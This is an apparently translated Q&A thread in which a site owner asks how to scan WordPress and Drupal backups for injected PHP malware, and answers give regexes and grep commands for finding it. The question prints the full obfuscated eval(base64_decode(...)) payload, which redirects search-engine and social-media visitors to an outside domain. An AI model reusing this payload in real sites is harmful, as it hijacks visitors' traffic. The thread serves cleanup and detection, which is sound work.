Шаблон для поиска вредоносного кода, начинающегося с eval (base64_decode

Question

У меня были проблемы на моем сервере со следующим PHP, вставленным во все мои сайты на Drupal и Wordpress.

Я скачал полную резервную копию своих сайтов и очистлю их все перед тем, как изменить данные моего ftp и снова загрузить их. Надеюсь, это должно прояснить ситуацию.

Мой вопрос:

При использовании Notepad ++ существуют ли критерии поиска в стиле *.*, которые я мог бы использовать для сканирования файлов резервных копий и удаления строк вредоносного кода без необходимости выполнять их все по отдельности на моем локальном компьютере?

Это явно сэкономит мне кучу времени. До сих пор я заменял следующий код на blank , но eval-код варьируется на каждом из моих сайтов.

eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZWZlcmVyLCJhcG9ydCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm5pZ21hIikgb3Igc3RyaXN0cigkcmVmZXJlciwid2ViYWx0YSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJlZ3VuLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwic3R1bWJsZXVwb24uY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYml0Lmx5Iikgb3Igc3RyaXN0cigkcmVmZXJlciwidGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmwvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vY29zdGFicmF2YS5iZWUucGwvIik7DQpleGl0KCk7DQp9DQp9DQp9DQp9"));

Answer 1

Я бы сразу изменил ваши данные FTP. Вы не хотите, чтобы они размещали Warez или что-то еще, если они смогли определить пароль.

Затем закройте ваш сайт, чтобы ваши посетители не подвергались каким-либо сценариям или угонам.

Что касается поиска, регулярное выражение, подобное этому, должно разобраться:

eval\(base64_decode\("[\d\w]+"\)\);

Answer 2

У меня также была такая же проблема с моими блогами на WordPress, eval base64_decode hack . В php-файлы вводились эти строки eval. Я предлагаю переустановить WordPress / Drupal, так как некоторые другие скрипты могут уже присутствовать на вашем сайте, а затем изменить все пароли.

Попробуйте запустить grep через ssh, например. grep -r -H "eval base64_decode". Он покажет вам, какие файлы заражены. Затем, если у вас есть время, автоматизируйте процесс, чтобы вас уведомили в случае повторения.

А в будущем всегда обновляйте WordPress / Drupal.

Answer 3

Проще, если вы можете использовать специальные инструменты для удаления этого вредоносного кода, потому что может быть сложно найти фактическое регулярное выражение, совпадающее со всем кодом, и вы никогда не узнаете, сработало ли это, или вы сломали свой сайт.Особенно, если у вас несколько файлов, вы должны идентифицировать подозрительные файлы с помощью следующих команд:

grep -R eval.*base64_decode  .
grep -R return.*base64_decode  .

, но этого может быть недостаточно, поэтому вам следует рассмотреть возможность использования этих сканеров безопасности PHP s.

Для получения более подробной информации, проверьте: Как избавиться от eval-base64_decode, такого как файлы вирусов PHP? .

Для Drupal, проверьте также: Какудалить вредоносные скрипты со страниц администратора после взлома?